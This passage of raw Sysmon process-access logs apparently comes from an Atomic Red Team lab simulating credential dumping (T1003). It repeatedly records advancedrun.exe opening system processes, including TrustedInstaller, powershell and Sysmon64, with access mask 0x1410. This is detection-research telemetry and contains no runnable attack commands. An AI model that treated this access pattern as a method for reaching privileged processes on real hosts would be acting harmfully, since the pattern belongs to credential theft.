M32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7D03-000000002702}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 